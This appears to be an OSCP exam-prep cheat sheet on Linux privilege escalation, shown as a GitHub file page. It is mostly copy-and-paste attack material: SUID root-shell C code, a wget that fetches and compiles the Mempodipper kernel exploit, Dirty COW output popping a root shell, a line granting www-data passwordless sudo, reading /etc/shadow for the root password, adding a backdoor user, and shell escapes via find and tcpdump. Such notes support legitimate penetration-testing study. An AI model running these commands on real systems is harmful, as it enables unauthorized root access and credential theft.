forked from sd-geek/OSCP
-
Notifications
You must be signed in to change notification settings - Fork 14
/
10 - Privilege Escalation Linux
152 lines (111 loc) · 4.94 KB
/
10 - Privilege Escalation Linux
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
---------------- Linux OS Enumeration ----------------
!!!!!!!!!!!!!! Most Common !!!!!!!!!!!!!!
List all SUID files
# find / -perm -4000 2>/dev/null
!!!!!!!!!!!!!! Most Common !!!!!!!!!!!!!!
Determine the current version of Linux
# cat /etc/issue
Determine more information about the environment
# uname -a
List processes running
# ps -xaf
List the allowed (and forbidden) commands for the invoking use
# sudo -l
List iptables rules
# iptables --table nat --list iptables -vL -t filter iptables -vL -t nat iptables -vL -t mangle iptables -vL -t raw iptables -vL -t security
Find UID 0 files root execution
# /usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null
Get handy linux file system enumeration script (/var/tmp)
# wget <https://highon.coffee/downloads/linux-local-enum.sh> chmod +x ./linux-local-enum.sh ./linux-local-enum.sh
Find executable files updated in August
# find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug
Find a specific file on linux
# find /. -name suid\*
Find all the strings in a file
# strings <filename>
Determine the type of a file
# file <filename>
Try the obvious - Maybe the user can sudo to root:
# sudo su
Highon.coffee Linux Local Enum wget https://highon.coffee/downloads/linux-local-enum.sh
Basic Linux Privilege Escalation
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Linux Privilege Exploit Suggester
https://github.com/PenturaLabs/Linux_Exploit_Suggester
Linux post exploitation enumeration and exploit checking tools
https://github.com/reider-roque/linpostexp
CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
https://www.exploit-db.com/exploits/15285/
CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
https://git.zx2c4.com/CVE-2012-0056/about/
Linux CVE 2012-0056
# wget -O exploit.c http://www.exploit-db.com/download/18411
# gcc -o mempodipper exploit.c
# ./mempodipper
CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
https://dirtycow.ninja/
First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016
./cow32
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 45420
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Run a command as a user other than root
# sudo -u waldo /usr/bin/vim /etc/apache2/sites-available/000-default.conf
Add a user or change a password
# /usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor
echo thePassword | passwd haxzor --stdin
Local Privilege Escalation Exploit in Linux
SUID (Set owner User ID up on execution)
Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.
below are some quick copy and paste examples for various shells:
SUID C Shell for /bin/bash
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
Building the SUID Shell binary
# gcc -o suid suid.c
For 32 bit:
# gcc -m32 -o suid suid.c
Create and compile an SUID from a limited shell (no file transfer)
# echo "int main(void){\nsetgid(0); setuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c
gcc privsc.c -o privsc
Add users to Root SUDO group with no password requirement
# echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
SearchSploit
# searchsploit –uncsearchsploit apache 2.2
# searchsploit "Linux Kernel"
# searchsploit linux 2.6 | grep -i ubuntu | grep local
# Searchsploit slmail
Kernel Exploit Suggestions for Kernel Version 3.0.0
# ./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0
Precompiled Linux Kernel Exploits - Super handy if GCC is not installed on the target machine!
https://www.kernel-exploits.com/
Collect root password
# cat /etc/shadow |grep root
Find and display the proof.txt or flag.txt - LOOT! `cat ``find / -name proof.txt -print```
----------------------- PrivEx examples -----------------------
Locate apps that you can run and already has root permission.
# for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done
# find / -perm -4000 2>/sev/null
Obtaining root shell with the find command
# touch test
# find test -exec "/bin/sh" \;
Read files using tail as admin
# tail -c1G /etc/shadow
Privexec through tcpdump
# COMMAND='ls -al /root'
# TF=$(mktemp)
# echo "$COMMAND" > $TF
# chmod +x $TF
# sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF